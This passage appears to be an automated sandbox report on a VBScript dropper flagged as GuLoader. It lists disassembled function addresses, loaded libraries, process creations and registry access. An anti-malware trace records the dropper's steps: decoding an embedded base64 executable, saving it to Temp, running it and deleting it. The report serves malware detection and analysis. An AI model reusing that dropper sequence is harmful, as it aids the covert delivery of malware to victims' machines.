Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35502E90	5_2_35502E90
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355ACE93	5_2_355ACE93
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F9EB0	5_2_354F9EB0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550B950	5_2_3550B950
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F9950	5_2_354F9950
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35506962	5_2_35506962
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F29A0	5_2_354F29A0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355BA9A6	5_2_355BA9A6
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F2840	5_2_354F2840
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FA840	5_2_354FA840
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555D800	5_2_3555D800
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E8F0	5_2_3551E8F0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F38E0	5_2_354F38E0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354D68B8	5_2_354D68B8
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AAB40	5_2_355AAB40
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AFB76	5_2_355AFB76
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A6BD7	5_2_355A6BD7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3552DBF9	5_2_3552DBF9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550FB80	5_2_3550FB80
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AFA49	5_2_355AFA49
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A7A46	5_2_355A7A46
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35563A6C	5_2_35563A6C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3559DAC6	5_2_3559DAC6
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354EEA80	5_2_354EEA80
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35535AA0	5_2_35535AA0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558DAAC	5_2_3558DAAC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05160535	7_2_05160535
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05217571	7_2_05217571
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051FD5B0	7_2_051FD5B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05220591	7_2_05220591
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521F43F	7_2_0521F43F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05212446	7_2_05212446
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05151460	7_2_05151460
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0520E4F6	7_2_0520E4F6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05184750	7_2_05184750
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05160770	7_2_05160770
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521F7B0	7_2_0521F7B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0515C7C0	7_2_0515C7C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_052116CC	7_2_052116CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0517C6E0	7_2_0517C6E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051FA118	7_2_051FA118
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05150100	7_2_05150100
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0522B16B	7_2_0522B16B
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0514F172	7_2_0514F172
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0519516C	7_2_0519516C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_052201AA	7_2_052201AA
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0516B1B0	7_2_0516B1B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_052181CC	7_2_052181CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521F0E0	7_2_0521F0E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_052170E9	7_2_052170E9
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051670C0	7_2_051670C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0520F0CC	7_2_0520F0CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521132D	7_2_0521132D
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0514D34C	7_2_0514D34C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521A352	7_2_0521A352
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051A739A	7_2_051A739A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_052203E6	7_2_052203E6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0516E3F0	7_2_0516E3F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05200274	7_2_05200274
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051652A0	7_2_051652A0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_052012ED	7_2_052012ED
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0517B2C0	7_2_0517B2C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0516AD00	7_2_0516AD00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05217D73	7_2_05217D73
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05163D40	7_2_05163D40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05211D5A	7_2_05211D5A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05178DBF	7_2_05178DBF
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0517FDC0	7_2_0517FDC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0515ADE0	7_2_0515ADE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05160C00	7_2_05160C00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051D9C32	7_2_051D9C32
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05200CB5	7_2_05200CB5
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521FCF2	7_2_0521FCF2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05150CF2	7_2_05150CF2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521FF09	7_2_0521FF09
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05180F30	7_2_05180F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051A2F28	7_2_051A2F28
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051D4F40	7_2_051D4F40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05161F92	7_2_05161F92
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521FFB1	7_2_0521FFB1
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05152FC8	7_2_05152FC8
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0516CFE0	7_2_0516CFE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521EE26	7_2_0521EE26
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05160E59	7_2_05160E59
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05172E90	7_2_05172E90
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05169EB0	7_2_05169EB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521CE93	7_2_0521CE93
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521EEDB	7_2_0521EEDB
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05169950	7_2_05169950
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0517B950	7_2_0517B950
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05176962	7_2_05176962
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0522A9A6	7_2_0522A9A6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051629A0	7_2_051629A0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05162840	7_2_05162840
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0516A840	7_2_0516A840
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051468B8	7_2_051468B8
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0518E8F0	7_2_0518E8F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051638E0	7_2_051638E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521FB76	7_2_0521FB76
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521AB40	7_2_0521AB40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0517FB80	7_2_0517FB80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0519DBF9	7_2_0519DBF9
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05216BD7	7_2_05216BD7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05217A46	7_2_05217A46
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0521FA49	7_2_0521FA49
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051D3A6C	7_2_051D3A6C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0515EA80	7_2_0515EA80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051FDAAC	7_2_051FDAAC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051A5AA0	7_2_051A5AA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0520DAC6	7_2_0520DAC6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030C1BC0	7_2_030C1BC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030C5220	7_2_030C5220
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030B1122	7_2_030B1122
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030C3460	7_2_030C3460
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030BCAC0	7_2_030BCAC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030DB8C0	7_2_030DB8C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030BAEA4	7_2_030BAEA4
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030BAD60	7_2_030BAD60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030BCCE0	7_2_030BCCE0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nsx8568.tmp\System.dll F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: String function: 35525130 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: String function: 3555EA12 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: String function: 35537E54 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: String function: 3556F290 appears 103 times
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: String function: 354DB970 appears 268 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 051A7E54 appears 88 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0514B970 appears 266 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 05195130 appears 36 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 051CEA12 appears 84 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 051DF290 appears 105 times

Source: Scan_20241030.vbs

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.troj.evad.winVBS@7/9@1/1

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

2_2_00403350

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

File created: C:\Users\user\assureres

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Scan_20241030.vbs

Static file information: File size 1223010 > 1048576

Source:

Binary string: wntdll.pdb source: temp_file_rhjRS.exe, verclsid.exe

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe", "1", "true");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IDictionary.Add("%%", "A");IDictionary.Add("))", "T");IDictionary.Add("@@", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Keys();IDictionary.Item("%%");IDictionary.Item("))");IDictionary.Item("@@");IDictionary.Item("...");IDictionary.Item("&&&");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACoIWBH7EAOFOxADhTsQA4UL09RFO5ADhTsQA8USUAOFC9PUxTjQA4UuGM");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe", "2");_Stream.Close();IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe");IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe")

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2739235138.00000000038CF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Code function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

2_2_10001B18

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 2_2_10002DE0 push eax; ret	2_2_10002E0E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E09AD push ecx; mov dword ptr [esp], ecx	5_2_354E09B6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051509AD push ecx; mov dword ptr [esp], ecx	7_2_051509B6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030C7306 pushad ; ret	7_2_030C7304
